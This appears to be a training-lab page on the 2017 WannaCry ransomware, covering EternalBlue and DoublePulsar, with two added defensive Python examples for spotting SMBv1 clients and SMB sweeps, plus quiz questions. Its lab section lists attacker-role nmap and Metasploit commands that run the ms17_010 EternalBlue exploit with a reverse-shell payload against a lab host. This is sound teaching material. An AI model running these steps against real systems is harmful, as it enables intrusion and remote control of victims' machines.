WannaCry Ransomware

Last updated: April 1, 2025

Introduction

Overview

In May 2017, the ransomware worm known as WannaCry infected numerous organizations and caused significant damage: over 200,000 systems were infected across 150 countries, with damages in the hundreds of millions of dollars. Prominent victims included Boeing, Honda, the NHS of England and Scotland, and the University of Montreal. The ransomware demanded a $300 Bitcoin payment in exchange for decryption of the victim's files, with the amount increasing over time if left unpaid. On the day of WannaCry's release, a hardcoded kill switch was discovered and promptly registered by a security researcher. While this did not help systems that were already infected, it effectively halted further spread of WannaCry within a matter of hours.

Vulnerability Details

WannaCry spread using EternalBlue, a previously undisclosed exploit for CVE-2017-0144, a flaw in how SMBv1 handles specially crafted packets that allows remote code execution. It also used a backdoor implant tool known as DoublePulsar, which runs in system memory and allows malware to be stealthily installed on the host. Both EternalBlue and DoublePulsar are believed to have been originally developed by the NSA and later stolen by the hacking group known as The Shadow Brokers, meaning they were not publicly known. Such vulnerabilities are called "zero days", referring to the number of days the vulnerability's existence has been publicly known. Because the flaw was previously unknown, security professionals have to begin developing patches the same day it is disclosed.
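Because the exploited weakness lives in the SMBv1 protocol handling, one of the most useful defensive checks is simply finding which hosts still speak SMBv1 on the network. The following is an added example, not code from the lab page: a minimal parser for the SMB Negotiate Protocol request (the first message a client sends) that reports the dialects a client offers, so captured traffic can be sorted into legacy SMB1-only clients, clients that still start with SMB1 framing but offer to upgrade, and clients that begin directly with SMB2. The sample packets are constructed inline; the field layouts follow the SMB1/SMB2 wire format (4-byte NetBIOS session header, then the SMB header), and the header flag values used in the builder are typical values, not something the parser depends on.

```python
# Added example, not code from the lab page: a minimal parser for the SMB
# Negotiate Protocol request that reports which dialects a client offers, so a
# defender reviewing captured traffic can find hosts still speaking SMBv1.
# The packets below are constructed for this example; the field layouts follow
# the SMB1/SMB2 wire format (4-byte NetBIOS session header, then the SMB header).
import struct

SMB1_MAGIC = b"\xffSMB"          # SMB1 header starts with 0xFF 'S' 'M' 'B'
SMB2_MAGIC = b"\xfeSMB"          # SMB2/3 header starts with 0xFE 'S' 'M' 'B'
SMB_COM_NEGOTIATE = 0x72         # SMB1 command code for Negotiate
SMB1_HEADER_LEN = 32

# Dialect strings that indicate SMB1 itself ("NT LM 0.12" is the one Windows uses).
SMB1_DIALECTS = {"PC NETWORK PROGRAM 1.0", "LANMAN1.0", "LM1.2X002", "NT LM 0.12"}


def build_smb1_negotiate(dialects):
    """Construct an SMB1-framed Negotiate request offering the given dialects
    (sample input for this example)."""
    # Each dialect is a BufferFormat byte 0x02 followed by a NUL-terminated string.
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    # Header fields after the magic: Command, Status, Flags, Flags2, PIDHigh,
    # SecurityFeatures, Reserved, TID, PIDLow, UID, MID (typical values, not checked here).
    header = SMB1_MAGIC + struct.pack(
        "<BIBHH8sHHHHH", SMB_COM_NEGOTIATE, 0, 0x18, 0xC853, 0, bytes(8), 0, 0, 0xFEFF, 0, 0
    )
    body = struct.pack("<BH", 0, len(data)) + data   # WordCount=0, ByteCount, dialects
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb  # NetBIOS session message


def parse_negotiate(packet):
    """Return ("smb2", None) for an SMB2-framed request, or ("smb1", dialects)
    for an SMB1 Negotiate request. Raises ValueError on malformed input."""
    if len(packet) < 8 or packet[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    length = int.from_bytes(packet[1:4], "big")
    smb = packet[4:4 + length]
    if len(smb) != length or len(smb) < 4:
        raise ValueError("truncated SMB message")
    if smb[:4] == SMB2_MAGIC:
        return "smb2", None
    if smb[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB message")
    if len(smb) < SMB1_HEADER_LEN + 3:
        raise ValueError("truncated SMB1 header")
    if smb[4] != SMB_COM_NEGOTIATE:
        raise ValueError("not a Negotiate request")
    word_count = smb[SMB1_HEADER_LEN]                 # parameter words (0 for Negotiate)
    offset = SMB1_HEADER_LEN + 1 + 2 * word_count
    if offset + 2 > len(smb):
        raise ValueError("truncated parameter block")
    byte_count = struct.unpack_from("<H", smb, offset)[0]
    offset += 2
    data = smb[offset:offset + byte_count]
    if len(data) != byte_count:
        raise ValueError("truncated data block")
    dialects, pos = [], 0
    while pos < len(data):
        if data[pos] != 0x02:
            raise ValueError("unexpected buffer format byte")
        end = data.find(b"\x00", pos + 1)
        if end == -1:
            raise ValueError("unterminated dialect string")
        dialects.append(data[pos + 1:end].decode("ascii", errors="replace"))
        pos = end + 1
    return "smb1", dialects


def classify(packet):
    """'smb2-only', 'smb1-capable' (SMB1 framing but offers to upgrade to SMB2),
    or 'smb1-only' (a legacy client that cannot speak anything newer)."""
    kind, dialects = parse_negotiate(packet)
    if kind == "smb2":
        return "smb2-only"
    offers_smb1 = any(d in SMB1_DIALECTS for d in dialects)
    offers_smb2 = any(d.startswith("SMB 2.") for d in dialects)
    if offers_smb1 and not offers_smb2:
        return "smb1-only"
    return "smb1-capable" if offers_smb1 else "smb2-only"


# Constructed sample captures: a legacy SMB1 client, a modern Windows-style client
# (SMB1 framing, offers SMB2), and a client that starts directly with SMB2.
LEGACY_CLIENT = build_smb1_negotiate(["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "NT LM 0.12"])
MODERN_CLIENT = build_smb1_negotiate(["NT LM 0.12", "SMB 2.002", "SMB 2.???"])
SMB2_CLIENT = b"\x00" + (64).to_bytes(3, "big") + SMB2_MAGIC + bytes(60)

if __name__ == "__main__":
    for name, pkt in [("legacy", LEGACY_CLIENT), ("modern", MODERN_CLIENT), ("smb2", SMB2_CLIENT)]:
        print(name, classify(pkt), parse_negotiate(pkt)[1])
```

Hosts classified as "smb1-only" are the ones that would block disabling SMBv1 on servers and are the first to patch or isolate; "smb1-capable" clients are normal for older Windows versions, but a server with SMBv1 disabled will refuse that initial dialect and force SMB2, which is the configuration that removes this attack surface.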

Learning Objectives

  • Describe Ransomware attacks
  • Explain zero-day vulnerabilities used in WannaCry ransomware
  • List common defense mechanisms against ransomware attacks

Remote Terminal

Terminal Description

In this lab, you'll step into the role of an attacker aiming to compromise a small organization's network to deploy ransomware, using a WiFi-connected terminal.

  • Use the help command to see all available commands.
  • The vulnerable machine's IP is 192.168.1.103.
  • Begin with nmap -p 139,445 192.168.1.0/24 to scan for open SMB ports.
  • Launch Metasploit with msfconsole, then load the scanner module with use auxiliary/scanner/smb/smb_ms17_010.
  • Set the target with set RHOST 192.168.1.103 and run the vulnerability check with run.
  • Further exploit with use exploit/windows/smb/ms17_010_eternalblue, set payload with set payload generic/shell_reverse_tcp, and execute with exploit.
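The steps above start with a sweep of the subnet for open SMB ports, and a self-propagating worm like WannaCry produces the same footprint once it is inside a network: one host opening connections to TCP/445 on many distinct peers within seconds. The following is an added example, not code from the lab page, showing how a defender can flag that pattern in connection logs. The log lines are constructed for this example in a simple "timestamp src dst dport" form (adapt the parser to your firewall or Zeek conn.log layout), and the 60-second window and five-target threshold are assumed tuning values, not figures from the page.

```python
# Added example, not code from the lab page: a detector for the traffic pattern
# that both a port sweep of the subnet and a self-propagating SMB worm leave
# behind, namely one source opening TCP/445 (or 139) connections to many distinct
# hosts in a short window. Log lines are constructed for this example in a simple
# "timestamp src dst dport" form; adapt parse_line() to your firewall or Zeek format.
from collections import defaultdict
from datetime import datetime

SMB_PORTS = {139, 445}

# Constructed sample log: 192.168.1.50 sweeps eight hosts in a few seconds;
# 192.168.1.20 talks to a single file server repeatedly (normal use);
# 192.168.1.21 touches three hosts spread over ten minutes (below threshold).
SAMPLE_LOG = """\
2017-05-12T08:00:00 192.168.1.20 192.168.1.103 445
2017-05-12T08:00:01 192.168.1.50 192.168.1.10 445
2017-05-12T08:00:01 192.168.1.50 192.168.1.11 445
2017-05-12T08:00:02 192.168.1.50 192.168.1.12 445
2017-05-12T08:00:02 192.168.1.50 192.168.1.13 139
2017-05-12T08:00:03 192.168.1.50 192.168.1.14 445
2017-05-12T08:00:03 192.168.1.50 192.168.1.15 445
2017-05-12T08:00:04 192.168.1.50 192.168.1.16 445
2017-05-12T08:00:04 192.168.1.50 192.168.1.17 445
2017-05-12T08:00:05 192.168.1.50 192.168.1.17 80
2017-05-12T08:00:30 192.168.1.20 192.168.1.103 445
2017-05-12T08:01:00 192.168.1.21 192.168.1.103 445
2017-05-12T08:04:00 192.168.1.20 192.168.1.103 445
2017-05-12T08:06:00 192.168.1.21 192.168.1.104 445
2017-05-12T08:11:00 192.168.1.21 192.168.1.105 445
"""


def parse_line(line):
    """Parse one constructed log line into (timestamp, src, dst, dport); None if malformed."""
    parts = line.split()
    if len(parts) != 4:
        return None
    try:
        return datetime.fromisoformat(parts[0]), parts[1], parts[2], int(parts[3])
    except ValueError:
        return None


def detect_smb_sweeps(lines, window_seconds=60, threshold=5):
    """Return one alert per source that reached at least `threshold` distinct
    hosts on SMB ports inside any `window_seconds`-long sliding window."""
    by_src = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[3] not in SMB_PORTS:
            continue                      # skip malformed lines and non-SMB traffic
        ts, src, dst, _ = rec
        by_src[src].append((ts, dst))

    alerts = []
    for src, events in sorted(by_src.items()):
        events.sort()                     # chronological order per source
        in_window = {}                    # dst -> number of events inside the window
        left, best, best_start = 0, 0, None
        for ts, dst in events:
            in_window[dst] = in_window.get(dst, 0) + 1
            # Slide the left edge forward until every event lies within the window.
            while (ts - events[left][0]).total_seconds() > window_seconds:
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) > best:
                best, best_start = len(in_window), events[left][0]
        if best >= threshold:
            alerts.append({
                "src": src,
                "distinct_targets": best,
                "window_start": best_start.isoformat(),
                "window_seconds": window_seconds,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_sweeps(SAMPLE_LOG.splitlines()):
        print(f"ALERT {alert['src']} reached {alert['distinct_targets']} SMB hosts "
              f"within {alert['window_seconds']}s starting {alert['window_start']}")
```

In a real deployment the threshold has to be tuned per environment, and authorised vulnerability scanners, backup servers and management hosts that legitimately fan out to many machines should be allowlisted rather than silenced by raising the threshold for everyone. An alert from an ordinary workstation is exactly the signal that lets a responder isolate the host before a worm reaches the rest of the subnet.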

Learn more about the commands being utilized:

Module Questions

What was the primary method used by WannaCry to encrypt victims' data?
What type of software was WannaCry?
What was the role of DoublePulsar in the WannaCry attack?
How was WannaCry's spread significantly reduced?
What could have prevented the WannaCry infection?
What is the hidden flag after exploiting the vulnerable machine?